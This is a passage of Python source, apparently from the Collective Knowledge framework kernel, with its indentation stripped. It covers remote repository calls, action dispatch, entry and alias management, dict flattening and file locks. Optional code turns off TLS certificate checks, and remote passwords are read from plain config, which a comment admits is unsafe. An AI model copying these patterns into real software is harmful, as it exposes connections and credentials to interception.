ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
add_ctx=True
# If auth
auth=None
add_auth=False
au=i.get('remote_server_user','')
if au!='':
del(i['remote_server_user'])
ap=i.get('remote_server_pass','')
if ap!='':
del(i['remote_server_pass'])
auth = urllib2.HTTPPasswordMgrWithDefaultRealm()
auth.add_password(None, url, au, ap)
add_auth=True
# Prepare handler (TBD: maybe there is another, more elegant way?)
if add_auth and add_ctx:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth), urllib2.HTTPSHandler(context=ctx)))
elif add_auth:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth)))
elif add_ctx:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)))
# Prepare request
request = urllib2.Request(url, post)
# Connect
try:
f=urllib2.urlopen(request)
except Exception as e:
return {'return':1, 'error':'Access to remote CK repository failed ('+format(e)+')'}
# Read from Internet
try:
s=f.read()
f.close()
except Exception as e:
return {'return':1, 'error':'Failed reading stream from remote CK web service ('+format(e)+')'}
# Check output
try: s=s.decode('utf8')
except Exception as e: pass
if o=='con' and act!='pull':
out(s.rstrip())
else:
# Try to convert output to dictionary
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0:
return {'return':1, 'error':'can\'t parse output from remote CK server ('+r['error']+'):\n'+s[:256]+'\n\n...)'}
d=r['dict']
if 'return' in d: d['return']=int(d['return']) # Fix for some strange behavior when 'return' is not integer - should check why ...
if d.get('return',0)>0:
return d
# Post process if pull file ...
if act=='pull':
if o!='json' and o!='json_file':
# Convert encoded file to real file ...
x=d.get('file_content_base64','')
fn=d.get('filename','')
if fn=='': fn=cfg['default_archive_name']
r=convert_upload_string_to_file({'file_content_base64':x, 'filename':fn})
if r['return']>0: return r
if 'file_content_base64' in d: del(d['file_content_base64'])
rr.update(d)
# Restore original output
i['out']=o
return rr
##############################################################################
# Perform action (find module or use kernel)
#
# TARGET: CK kernel and low-level developers
def perform_action(i):
"""
Input: {
all parameters from function 'access'
(web) - if 'yes', called from the web
(common_func) - if 'yes', ignore search for modules
and call common func from the CK kernel
or
(kernel)
(local) - if 'yes', run locally even if remote repo ...
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(out) - if action change output, return it
Output from the module/action
}
"""
# Check action
action=i.get('action','')
if action=='':
action='short_help'
elif action=='-?' or action=='-h' or action=='--help':
action='help'
# Check web
wb=i.get('web','')
# Substitute # in CIDs
cid=i.get('cid','')
cids=i.get('cids',[])
xout=i.get('out','')
ruoa=''
ruid=''
repo_module_uoa=i.get('repo_module_uoa','')
need_subst=False
rc={} # If CID from current directory
if cid.startswith(cfg['detect_cur_cid']) or cid.startswith(cfg['detect_cur_cid1']):
need_subst=True
else:
for c in cids:
if c.startswith(cfg['detect_cur_cid']) or c.startswith(cfg['detect_cur_cid1']):
need_subst=True
break
# If need to substitute #, attempt to detect current CID
if need_subst:
rc=detect_cid_in_current_path({})
if rc['return']>0: return rc
# Process cid (module or CID)
module_uoa=cid
if cid.find(':')>=0 or cid.startswith(cfg['detect_cur_cid']) or cid.startswith(cfg['detect_cur_cid1']):
# Means that CID
r=parse_cid({'cid':cid, 'cur_cid':rc})
if r['return']>0: return r
module_uoa=r.get('module_uoa','')
duoa=r.get('data_uoa','')
if duoa!='': i['data_uoa']=duoa
ruoa=r.get('repo_uoa','')
if ruoa!='': i['repo_uoa']=ruoa
# If module_uoa exists in input, set module_uoa
if i.get('module_uoa','')!='': module_uoa=i['module_uoa']
i['module_uoa']=module_uoa
# Check if repo exists and possibly remote!
remote=False
local=i.get('local','')
rs=i.get('remote_server_url','')
if rs=='':
ruoa=i.get('repo_uoa','')
if ruoa!='' and ruoa.find('*')<0 and ruoa.find('?')<0:
rq=load_repo_info_from_cache({'repo_uoa':ruoa})
if rq['return']>0: return rq
dd=rq.get('dict',{})
if dd.get('remote','')=='yes' and local!='yes':
rs=dd.get('url','')
if rs=='':
return {'return':1, 'error':'URL of remote repository is not defined'}
i['remote_server_url']=rs
if dd.get('remote_user','')!='':
i['remote_server_user']=dd['remote_user']
# It is completely unsave - just for proof of concept ...
if dd.get('remote_password','')!='':
i['remote_server_pass']=dd['remote_password']
if dd.get('remote_skip_certificate_validation','')!='':
i['remote_skip_certificate_validation']=dd['remote_skip_certificate_validation']
if dd.get('remote_repo_uoa','')!='':
i['repo_uoa']=dd['remote_repo_uoa']
else:
del (i['repo_uoa'])
if i.get('remote_repo_uoa','')!='':
i['repo_uoa']=i['remote_repo_uoa']
del(i['remote_repo_uoa'])
if rs!='' and local!='yes':
return perform_remote_action(i)
# Process and parse cids -> xcids
xcids=[]
for c in cids:
r=parse_cid({'cid':c, 'cur_cid':rc, 'ignore_error':'yes'}) # here we ignore errors, since can be a file name, etc
if r['return']>0: return r
xcids.append(r)
i['xcids']=xcids
# Check if common function
cf=i.get('common_func','')
if cf=='': cf=i.get('common','') # making it easier to call it from the command line
# Check if no module_uoa, not common function, then try to get module from current
module_detected_from_dir=False
if not need_subst and cf!='yes' and module_uoa=='' and action not in cfg['common_actions']:
rc=detect_cid_in_current_path({})
if rc['return']==0:
module_uoa=rc.get('module_uoa','')
module_detected_from_dir=True
display_module_uoa = module_uoa
default_action_name = None
loaded_module = None
## If a specific module_uoa was given (not a wildcard) :
#
if cf!='yes' and module_uoa!='' and module_uoa.find('*')<0 and module_uoa.find('?')<0:
# Find module and load meta description
rx=load({'repo_uoa':repo_module_uoa,
'module_uoa':cfg['module_name'],
'data_uoa':module_uoa})
if rx['return']>0:
if cfg.get('download_missing_components','')!='yes':
return rx
# Check if search in remote server ...
restarted=False
if rx['return']==16:
xout2=''
if xout=='con': xout2=xout
# Try to download missing action/module
ry=download({'module_uoa':cfg['module_name'],
'data_uoa':module_uoa,
'out':xout2})
if ry['return']>0: return ry
# Attempt to load module again
rx=load({'module_uoa':cfg['module_name'],
'data_uoa':module_uoa})
if rx['return']>0: return rx
restarted=True
xout=''
if xout=='con':
out('')
if not restarted:
return rx
xmodule_uoa=rx['data_uoa']
xmodule_uid=rx['data_uid']
display_module_uoa = '"{}"'.format(xmodule_uoa)
if xmodule_uoa!=xmodule_uid:
display_module_uoa += ' ({})'.format(xmodule_uid)
# Check if allowed to run only from specific repos
if cfg.get('allow_run_only_from_allowed_repos','')=='yes':# and cf!='yes':
ruid=rx['repo_uid']
if ruid not in cfg.get('repo_uids_to_allow_run',[]):
return {'return':1, 'error':'executing commands is not allowed from this repository "'+ruid+'"'}
u=rx['dict']
p=rx['path']
# Check logging of repo:module:uoa to be able to rebuild CK dependencies
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"'+action+'", "repo_uoa":"'+
i.get('repo_uoa','')+'", "repo_module_uoa":"'+
repo_module_uoa+'", "module_uoa":"'+
xmodule_uoa+'", "module_uid":"'+
xmodule_uid+'", "data_uoa":"'+
i.get('data_uoa','')+'"\n',
'append':'yes'})
if rl['return']>0: return rl
declared_action = action in u.get('actions',{})
default_action_name = u.get('default_action_name','')
intercept_kernel = i.get('{}.intercept_kernel'.format(module_uoa),'')
if declared_action or default_action_name:
# Load module
mcn=u.get('module_name',cfg['module_code_name'])
if i.get('module_version','')!='':
mcnv=i['module_version'].strip()
if mcnv=='0':
mcnv=''
else:
mcnv=u.get('module_version','')
if mcnv!='':
mcn+='.'+mcnv
r=load_module_from_path({'path':p, 'module_code_name':mcn, 'cfg':u, 'data_uoa':rx['data_uoa']})
if r['return']>0: return r
loaded_module=r['code']
loaded_module.work['self_module_uid']=rx['data_uid']
loaded_module.work['self_module_uoa']=rx['data_uoa']
loaded_module.work['self_module_alias']=rx['data_alias']
loaded_module.work['path']=p
action1=u.get('actions_redirect',{}).get(action,'')
if action1=='': action1=action
if i.get('help','')=='yes' or i.get('api','')=='yes':
return get_api({'path':p, 'func':action1, 'out':xout})
if wb=='yes' and (xout=='con' or xout=='web') and u.get('actions',{}).get(action,{}).get('for_web','')!='yes':
return {'return':1, 'error':'this action is not supported in remote/web mode'}
if declared_action:
a=getattr(loaded_module, action1)
return a(i)
elif default_action_name and intercept_kernel:
a=getattr(loaded_module, default_action_name)
return a(i)
# otherwise fall through and try a "special" kernel method first
# Check if action == special keyword (add, delete, list, etc)
if (module_uoa!='' and action in cfg['common_actions']) or \
((module_uoa=='' or module_detected_from_dir) and action in cfg['actions']):
# Check function redirect - needed if action
# is the same as internal python keywords such as list
action1=cfg['actions_redirect'].get(action,'')
if action1=='': action1=action
if i.get('help','')=='yes' or i.get('api','')=='yes':
return get_api({'path':'', 'func':action1, 'out':xout})
if wb=='yes' and (xout=='con' or xout=='web') and cfg.get('actions',{}).get(action,{}).get('for_web','')!='yes':
return {'return':1, 'error':'this action is not supported in remote/web mode '}
a=getattr(sys.modules[__name__], action1)
return a(i)
if default_action_name:
a=getattr(loaded_module, default_action_name)
return a(i)
# Prepare error
if module_uoa=='':
er='in kernel'
else:
er='in module '+display_module_uoa
return {'return':1,'error':'action "'+action+'" not found '+er}
##############################################################################
# Print API from module for a given action #
#
# TARGET: CK kernel and low-level developers
def get_api(i):
"""
Input: {
(path) - path to module, if comes from access function
or
(module_uoa) - if comes from CMD
(func) - func for API
(out) - output
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
title - title string
desc - original description
module - module name
api - api as string
line - line in found module
}
"""
p=i.get('path','')
f=i.get('func','')
o=i.get('out','')
muoa=i.get('module_uoa','')
t='' # last function description (if redirect to another API)
t_orig='' # original function description
l=0 # API line
a='' # accumulated API
if p=='' and muoa!='':
rx=load({'module_uoa':cfg['module_name'],
'data_uoa':muoa})
if rx['return']>0: return rx
p=rx['path']
if p=='':
p1=os.path.dirname(os.path.dirname(work['dir_default_repo']))
p=os.path.join(p1, cfg['file_kernel_py'])
if not os.path.isfile(p):
return {'return':1, 'error':'kernel not found in '+p}
else:
p=os.path.join(p, 'module.py')
if os.path.isfile(p):
rx=load_text_file({'text_file':p, 'split_to_list':'yes'})
if rx['return']>0: return rx
lst=rx['lst']
k=-1
while k<len(lst)-1:
k+=1
q=lst[k]
if q.find('def '+f+'(')>=0 or q.find('def '+f+' (')>=0 or \
q.find('def\t'+f+'(')>=0 or q.find('def\t'+f+' (')>=0:
j=k-1
if j>=0 and lst[j].strip()=='': j-=1
x='x'
while j>=0 and x!='' and not x.startswith('###'):
x=lst[j].strip()
if x!='' and not x.startswith('###'):
if x=='#': x=' '
elif x.startswith('# '): x=x[2:]
t=x+'\n'+t
j-=1
if t!='':
l=j+2
if t_orig=='': t_orig=t
# Find starting point of an API
j=k+1
if j<len(lst) and lst[j].find('"""')>=0:
j+=1
# Check if redirect to another function
restart=False
if j<len(lst):
x=lst[j].strip()
if x.lower().startswith("see"):
z1=x.find('"')
if z1>0:
z2=x.find('"',z1+1)
if z2>0:
f=x[z1+1:z2] # new function name
k=-1
restart=True # restart search for new function
if not restart:
x=''
while x.find('"""')<0 and j<len(lst):
x=lst[j]
if x.find('"""')<0:
a+=x+'\n'
j+=1
if t=='' and a=='':
return {'return':1, 'error':'function not found'}
dd=t_orig.strip()
if o=='con':
out('Description: '+dd)
out('')
out('Module: '+p)
out('')
out('Line: '+str(l))
out('')
out('API:')
out(a)
elif o=='web':
out('<B>Function:</B> '+t+'<BR>')
out('<BR>')
out('<B>Module:</B> '+p+'<BR>')
out('<BR>')
out('<B>API:</B><BR>')
out('<pre>')
out(a)
out('</pre><BR>')
return {'return':0, 'title':t, 'desc':dd, 'module':p, 'api':a, 'line':l}
##############################################################################
# Convert CID to dict and add missing parts in CID with current path if #
#
# TARGET: CK kernel and low-level developers
def parse_cid(i):
"""
Input: {
cid - in format (REPO_UOA:)MODULE_UOA:DATA_UOA
(cur_cid) - output of function 'detect_cid_in_current_path'
(ignore_error) - if 'yes', ignore wrong format
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
data_uoa - data UOA
module_uoa - module UOA
(repo_uoa) - repo UOA
}
"""
r={'return':0}
c=i['cid'].strip()
ie=i.get('ignore_error','')
cc=i.get('cur_cid', {})
a0=cc.get('repo_uoa','')
m0=cc.get('module_uoa','')
d0=cc.get('data_uoa','')
if c.startswith(cfg['detect_cur_cid']) or c.startswith(cfg['detect_cur_cid1']):
c=c[1:]
x=c.split(':')
if len(x)<2 and m0=='':
if ie!='yes':
return {'return':1, 'error':'unknown CID format'}
else:
return r
if c=='':
r['repo_uoa']=a0
r['module_uoa']=m0
r['data_uoa']=d0
elif len(x)==1:
if a0!='': r['repo_uoa']=a0
r['module_uoa']=m0
r['data_uoa']=x[0]
elif len(x)==2:
if a0!='': r['repo_uoa']=a0
r['module_uoa']=x[0]
r['data_uoa']=x[1]
elif len(x)==3:
r['repo_uoa']=x[0]
r['module_uoa']=x[1]
r['data_uoa']=x[2]
else:
if ie!='yes':
return {'return':1, 'error':'unknown CID format'}
return r
##############################################################################
# Create an UOA entry in a given path
#
# TARGET: CK kernel and low-level developers
def create_entry(i):
"""
Input: {
path - path where to create an entry
(split_dirs) - (int) number of first characters to split directory into subdirectories
to be able to handle many entries (similar to Mediawiki)
(data_uoa) - data UOA
(data_uid) - if uoa is an alias, we can force data UID
(force) - if 'yes', force creation even if directory already exists
(allow_multiple_aliases) - if 'yes', allow multiple aliases for the same UID
(needed for cKnowledge.io to publish
renamed components with the same UID)
}
Output: {
return - return code = 0, if successful
16, if data entry already exists
> 0, if error
(error) - error text if return > 0
path - path to data entry
data_uid - data UID (from UOA)
data_alias - data alias (from UOA)
data_uoa - data alias or data uid if data alias==''
}
"""
p0=i.get('path','')
d=i.get('data_uoa','')
di=i.get('data_uid','')
ama=(i.get('allow_multiple_aliases','')=='yes') # Experimental functionality for cKnowledge.io
split_dirs=safe_int(i.get('split_dirs',0),0)
xforce=i.get('force','')
if xforce=='yes':
force=True
else:
force=False
# If no uoa, generate UID
alias=''
uid=''
if d=='':
if di=='':
r=gen_uid({})
if r['return']>0: return r
uid=r['data_uid']
else:
uid=di
# Check if already exists
iii={'path':p0, 'data_uoa':uid}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
r['return']=16
return r
alias=''
else:
# Check if already exists
if not force:
# Check if already exists
iii={'path':p0, 'data_uoa':d}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
r['return']=16
return r
if is_uid(d):
uid=d
alias=''
else:
alias=d
if di!='':
uid=i['data_uid']
else:
r=gen_uid({})
if r['return']>0: return r
uid=r['data_uid']
# Check dir name
dir_name=(alias,uid) [alias=='']
# Check split
p00=p0
sd1,sd2=split_name(dir_name, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p00=os.path.join(p0,sd1)
# Create first split if doesn't exist
if not os.path.isdir(p00):
os.mkdir(p00)
# Finalize path to entry
p=os.path.join(p00, dir_name)
# Check alias disambiguation
if alias!='':
p1=os.path.join(p0, cfg['subdir_ck_ext'])
if not os.path.isdir(p1):
# Create .cm directory
try: # pragma: no cover
os.mkdir(p1)
except Exception as e:
return {'return':1, 'error':format(e)}
# Check if alias->uid exist
p3=os.path.join(p1, cfg['file_alias_a'] + alias)
if os.path.isfile(p3): # pragma: no cover
try:
fx=open(p3)
uid1=fx.readline().strip()
fx.close()
except Exception as e:
None
if uid1!=uid:
return {'return':1, 'error':'different alias->uid disambiguator already exists in '+p3}
# Check if uid->alias exist
xalias=alias
p2=os.path.join(p1, cfg['file_alias_u'] + uid)
if os.path.isfile(p2): # pragma: no cover
alias1=''
alias1s=[]
try:
fx=open(p2)
alias1=fx.read().strip()
alias1s=alias1.split('\n')
fx.close()
except Exception as e:
None
if alias not in alias1s:
if ama:
xalias=alias+'\n'+alias1
else:
return {'return':1, 'error':'different uid->alias disambiguator already exists in '+p2}
ru=save_text_file({'text_file':p3, 'string':uid+'\n'})
if ru['return']>0: return ru
ru=save_text_file({'text_file':p2, 'string':xalias+'\n'})
if ru['return']>0: return ru
# Create directory
if not os.path.exists(p):
try:
os.mkdir(p)
except Exception as e:
return {'return':1, 'error':format(e)}
uoa=uid
if alias!='': uoa=alias
return {'return':0, 'path':p, 'data_uid':uid, 'data_alias':alias, 'data_uoa':uoa}
##############################################################################
# Delete entry alias from path
#
# TARGET: CK kernel and low-level developers
def delete_alias(i):
"""
Input: {
path - path to the entry
data_uid - data UID
(data_alias) - data alias
(repo_dict) - repo cfg if available to check sync
(share) - if 'yes', try to rm via GIT
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
rd=i.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
if i.get('share','')=='yes': rshared='git'
p=i['path']
alias=i.get('data_alias','')
uid=''
if alias!='' and os.path.isdir(p):
p0=os.path.join(p, cfg['subdir_ck_ext'])
p9=cfg['file_alias_a'] + alias
p1=os.path.join(p0, p9)
if rshared!='':
ppp=os.getcwd()
os.chdir(p0)
if os.path.isfile(p1):
try:
f=open(p1)
uid=f.readline().strip()
f.close()
except Exception as e:
None
if rshared!='':
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', p9)
rx=os.system(ss)
if os.path.isfile(p1): os.remove(p1)
if uid=='': uid=i['data_uid']
if uid!='':
p9=cfg['file_alias_u'] + uid
p1=os.path.join(p0, p9)
if os.path.isfile(p1):
# Check if multiple aliases
delete=True
alias1=''
alias1s=[]
try:
fx=open(p1)
alias1=fx.read().strip()
alias1s=alias1.split('\n')
fx.close()
except Exception as e:
None
if len(alias1s)>1:
delete=False
alias1s.remove(alias)
xalias='\n'.join(alias1s)
# Update alias disambiguator
ru=save_text_file({'text_file':p1, 'string':xalias})
if ru['return']>0: return ru
if delete:
if rshared!='':
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', p9)
rx=os.system(ss)
if os.path.isfile(p1):
os.remove(p1)
if rshared!='':
os.chdir(ppp)
return {'return':0}
##############################################################################
# Delete a given directory with subdirectories (be careful)
#
# TARGET: CK kernel and low-level developers
def delete_directory(i):
"""
Input: {
path - path to delete
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import shutil
p=i['path']
if os.path.isdir(p):
shutil.rmtree(p, onerror=rm_read_only)
return {'return':0}
##############################################################################
# Convert dictionary into CK flat format
#
# TARGET: end users
def flatten_dict(i):
"""
Any list item is converted to @number=value
Any dict item is converted to #key=value
# is always added at the beginning
Input: {
dict - python dictionary
(prefix) - prefix (for recursion)
(prune_keys) - list of keys to prune (can have wildcards)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - flattened dictionary
}
"""
prefix='#'
if i.get('prefix','')!='': prefix=str(i['prefix'])
a=i['dict']
aa={}
pk=i.get('prune_keys','')
if pk=='': pk=[]
flatten_dict_internal(a, aa, prefix, pk)
return {'return':0, 'dict': aa}
##############################################################################
# Convert dictionary into CK flat format (internal, used for recursion)
#
# TARGET: internal use
def flatten_dict_internal(a, aa, prefix, pk):
# Start flattening
if type(a) is dict or type(a) is list:
i=0
for x in a:
if type(a) is dict:
v=a[x]
prefix1=prefix+'#'+str(x)
else:
prefix1=prefix+'@'+str(i)
v=x
if type(v) is dict or type(v) is list:
flatten_dict_internal(v, aa, prefix1, pk)
else:
if flatten_dict_internal_check_key(prefix1, pk):
aa[prefix1]=v
i+=1
else:
if flatten_dict_internal_check_key(prefix, pk):
aa[prefix]=a
return {'return':0, 'dict': a}
##############################################################################
# Convert dictionary into CK flat format (internal, used for recursion)
#
# TARGET: end users
def flatten_dict_internal_check_key(prefix, pk):
import fnmatch
add=False
if len(pk)==0:
add=True
else:
for c in pk:
if '*' in c or '?' in c:
if fnmatch.fnmatch(prefix,c):
add=True
break
else:
if prefix==c:
add=True
break
return add
##############################################################################
# Get value from dict by flat key
#
# TARGET: end users
def get_by_flat_key(i):
"""
Input: {
dict - dictionary
key - flat key
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
value - value or None, if doesn't exist
}
"""
# Check vars
v=None
a=i['dict']
k=i['key']
# Remove leading # if exists
if len(k)>0 and k[0:1]=='#': k=k[1:]
k1=''
kt='' # type '#' or '@'
x=0
finish=False
while not finish:
y=k[x]
x+=1
if y=='#' or y=='@':
if kt=='#':
if k1 not in a: break
a=a[k1]
elif kt=='@':
if len(a)<=type_long(k1): break
a=a[type_long(k1)]
k1=''
kt=y
else:
k1+=y
if x>=len(k): break
if k1!='' and kt!='':
if kt=='#':
if k1 in a: v=a[k1]
else:
if len(a)>type_long(k1): v=a[type_long(k1)]
return {'return':0, 'value': v}
##############################################################################
# Set value in array using flattened key
#
# TARGET: end users
def set_by_flat_key(i):
"""
Input: {
dict - dict (it will be directly changed!)
key - flat key (or not if doesn't start with #)
value - value to set
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - modified dict
}
"""
a=i['dict']
k=i['key']
v=i['value']
# Remove leading # if there
if len(k)>0 and k[0:1]=='#': k=k[1:]
k1=''
kt='' # type '#' or '@'
x=0
finish=False
while not finish:
y=k[x]
x+=1
if y=='#' or y=='@':
if kt=='#':
if k1 not in a:
if y=='#': a[k1]={}
else: a[k1]=[]
a=a[k1]
elif kt=='@':
if len(a)<=type_long(k1):
for q in range(len(a)-1,type_long(k1)):
if y=='#': a.append({})
else: a.append([])
a=a[type_long(k1)]
k1=''
kt=y
else:
k1+=y
if x>=len(k): break
if k1!='' and kt!='':
if kt=='#':
a[k1]=v
else:
if len(a)<=type_long(k1):
for q in range(len(a)-1,type_long(k1)):
if y=='#': a.append({})
else: a.append([])
a[type_long(k1)]=v
return {'return':0, 'dict': i['dict']}
##############################################################################
# Restore flattened dict
#
# TARGET: end users
def restore_flattened_dict(i):
"""
Input: {
dict - flattened dict
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - restored dict
}
"""
# Check vars
a={} # default
b=i['dict']
first=True
for x in b:
if first:
first=False
y=x[1:2]
if y=='@': a=[]
else: a={}
set_by_flat_key({'dict':a, 'key':x, 'value':b[x]})
return {'return':0, 'dict': a}
##############################################################################
# Set lock for path
#
# TARGET: CK kernel and low-level developers
def set_lock(i):
"""
Input: {
path - path to be locked
(get_lock) - if 'yes', lock this entry
(lock_retries) - number of retries to aquire lock (default=11)
(lock_retry_delay) - delay in seconds before trying to aquire lock again (default=3)
(lock_expire_time) - number of seconds before lock expires (default=30)
(unlock_uid) - UID of the lock to release it
}
Output: {
return - return code = 0, if successful
= 32, couldn't acquire lock (still locked after all retries)
> 0, if error
(error) - error text if return > 0
(lock_uid) - lock UID, if locked successfully
}
"""
p=i['path']
gl=i.get('get_lock','')
uuid=i.get('unlock_uid','')
exp=float(i.get('lock_expire_time','30'))
rr={'return':0}
if gl=='yes' or uuid!='':
pl=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])
luid=''
if os.path.isfile(pl):
import time
# Read lock file
try:
f=open(pl)
luid=f.readline().strip()
exp=float(f.readline().strip())
if exp<0: exp=1
f.close()
except Exception as e:
return {'return':1, 'error':'problem reading lock file'}
# Check if lock has expired
if gl=='yes' and uuid=='':
# Retry if locked
retry=int(i.get('lock_retries','11'))
retryd=float(i.get('lock_retry_delay','3'))
dt=os.path.getmtime(pl)+exp-time.time()
if dt>0:
while retry>0 and os.path.isfile(pl) and dt>0:
retry-=1
time.sleep(retryd)
if os.path.isfile(pl):
dt=os.path.getmtime(pl)+exp-time.time()
if retry==0 and dt>0 and os.path.isfile(pl):
return {'return':32, 'error':'entry is still locked'}
luid=''
if os.path.isfile(pl): os.remove(pl)
# Release lock if requested (and if not locked by another UID)
if luid!='' and uuid!='':
if luid!=uuid:
return {'return':32, 'error': 'entry is locked with another UID'}
luid=''
os.remove(pl)
# Finish acquiring lock
if gl=='yes':
# (Re)acquire lock
if uuid=='':
r=gen_uid({})
if r['return']>0: return r
luid=r['data_uid']
else:
luid=uuid
# Write lock file
try:
f=open(pl,'w')
f.write(luid+'\n')
f.write(str(exp)+'\n')
f.close()
except Exception as e:
return {'return':1, 'error':'problem writing lock file'}
rr['lock_uid']=luid
return rr
##############################################################################
# Check if locked and unlock if needed
#
# TARGET: CK kernel and low-level developers
def check_lock(i):
"""
Input: {
path - path to be locked
(unlock_uid) - UID of the lock to release it
}
Output: {
return - return code = 0, if successful
= 32, lock UID is not matching
> 0, if error
(error) - error text if return > 0
}
"""
p=i['path']
uuid=i.get('unlock_uid','')
pl=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])
luid=''
if os.path.isfile(pl):
import time
# Read lock file
try:
f=open(pl)
luid=f.readline().strip()
exp=float(f.readline().strip())
if exp<0: exp=1
f.close()
except Exception as e:
return {'return':1, 'error':'problem reading lock file'}
# Check if lock has expired
dt=os.path.getmtime(pl)+exp-time.time()
if dt<0:
# Expired
if uuid=='' or uuid==luid:
os.remove(pl)
else:
return {'return':32, 'error':'entry lock UID is not matching'}
else:
if uuid=='':
return {'return':32, 'error':'entry is locked'}
elif uuid!=luid:
return {'return':32, 'error':'entry is locked with different UID'}
elif uuid!='':
return {'return':32, 'error':'lock was removed or expired'}
return {'return':0}
##############################################################################
# Get current date and time
#
# TARGET: end users
def get_current_date_time(i):
"""
Input: {}
Output: {
return - return code = 0
array - array with date and time
iso_datetime - date and time in ISO format
}
"""
import datetime
a={}
now1=datetime.datetime.now()
now=now1.timetuple()
a['date_year']=now[0]
a['date_month']=now[1]
a['date_day']=now[2]
a['time_hour']=now[3]
a['time_minute']=now[4]
a['time_second']=now[5]
return {'return':0, 'array':a, 'iso_datetime':now1.isoformat()}
##############################################################################
###########################################################
# Detect CID of the current directory (repository entry)
#
# TARGET: CK kernel and low-level developers
def detect_cid_in_current_path(i):
"""
Input: {
(path) - path, otherwise current directory
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
(module_uoa) - module UOA
(module_uid) - module UID
(module_alias) - module alias
(data_uoa) - data UOA
(data_uid) - data UID
(data_alias) - data alias
}
"""
p=i.get('path','')
if p=='': p=os.getcwd()
p=os.path.normpath(p)
dirs=[]
p1=''
pr='*'
found=False
while pr!='':
p1=os.path.join(p, cfg['repo_file'])
if os.path.isfile(p1):
found=True
break
p2=os.path.split(p)
p=p2[0]
pr=p2[1]
dirs.append(pr)
if not found:
return {'return':16, 'error':'repository is not detected in the current path'}
# Find info about repo (prepared as return dict)
r=find_repo_by_path({'path':p})
if r['return']>0: return r
repo_dict=r.get('repo_dict',{})
# Check info about module
ld=len(dirs)
if ld>0:
m=dirs[ld-1]
split_dirs=0
rx=find_path_to_entry({'path':p, 'data_uoa':m})
if rx['return']>0 and rx['return']!=16: return rx
elif rx['return']==0:
r['module_uoa']=rx['data_uoa']
r['module_uid']=rx['data_uid']
r['module_alias']=rx['data_alias']
muid=rx['data_uid']
muoa=rx['data_uoa']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(repo_dict, muid, muoa)
# Check info about data
if ld>1:
d=dirs[ld-2]
iii={}
if split_dirs!=0:
d=dirs[ld-3]
iii['split_dirs']=split_dirs
iii['path']=os.path.join(p,m)
iii['data_uoa']=d
rx=find_path_to_entry(iii)
if rx['return']>0 and rx['return']!=16: return rx
elif rx['return']==0:
r['data_uoa']=rx['data_uoa']
r['data_uid']=rx['data_uid']
r['data_alias']=rx['data_alias']
return r
# **************************************************************************
# Actions, visible outside through module '*' such as [ck uid] or [ck uid *]
# **************************************************************************
############################################################
# Action: generate CK UID
#
# TARGET: end users
def uid(i):
"""
Input: {}
Output: {
Output from 'gen_uid' function
}
"""
o=i.get('out','')
r=gen_uid({})
if r['return']>0: return r
if o=='con':
out(r['data_uid'])
return r
############################################################
# Action: print CK version
#
# TARGET: end users
def version(i):
"""
Input: {}
Output: {
output from function 'get_version'
}
"""
o=i.get('out','')
r=get_version({})
if r['return']>0: return r
version_str=r['version_str']
if o=='con':
out('V'+version_str)
return r
############################################################
# Action: print python version used by CK
#
# TARGET: end users
def python_version(i):
"""
Input: {}
Output: {
version - sys.version
version_info - sys.version_info
}
"""
import sys
o=i.get('out','')
v1=sys.version
v2=sys.version_info
if o=='con':
out(v1)
return {'return':0, 'version':v1, 'version_info':v2}
############################################################
# Action: check CK status
#
# TARGET: CK kernel and low-level developers
def status(i):
"""
Input: {}
Output: {
outdated - if 'yes', newer version exists
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
outdated=''
o=i.get('out','')
try: import urllib.request as urllib2
except: import urllib2
try: from urllib.parse import urlencode
except: from urllib import urlencode
page=''
try:
res=urllib2.urlopen(cfg['status_url'])
page=res.read()
except urllib2.HTTPError as e:
return {'return':1, 'error':'Problem accessing server ('+format(e)+')'}
except urllib2.URLError as e:
return {'return':1, 'error':'Problem accessing server ('+format(e)+')'}
# Support for Python 3
if sys.version_info[0]>2:
try:
page=page.decode('utf-8')
except Exception as e:
pass
if page!='':
s1='version=\''
i1=page.find(s1)
if i1>0:
i2=page.find('\'',i1+9)
if i2>0:
lversion_str=page[i1+len(s1):i2].strip()
rx=check_version({'version':lversion_str})
if rx['return']>0: return rx
ok=rx['ok']
version_str=rx['current_version']
if ok!='yes':
outdated='yes'
if o=='con':
out('Your version is outdated: V'+version_str)
out('New available version : V'+lversion_str)
u=cfg.get('ck_web','')
if u!='':
out('')
out('If you install CK via pip, upgrade it as follows (prefix with "sudo" on Linux):')
out(' $ pip install ck --upgrade')
out('')
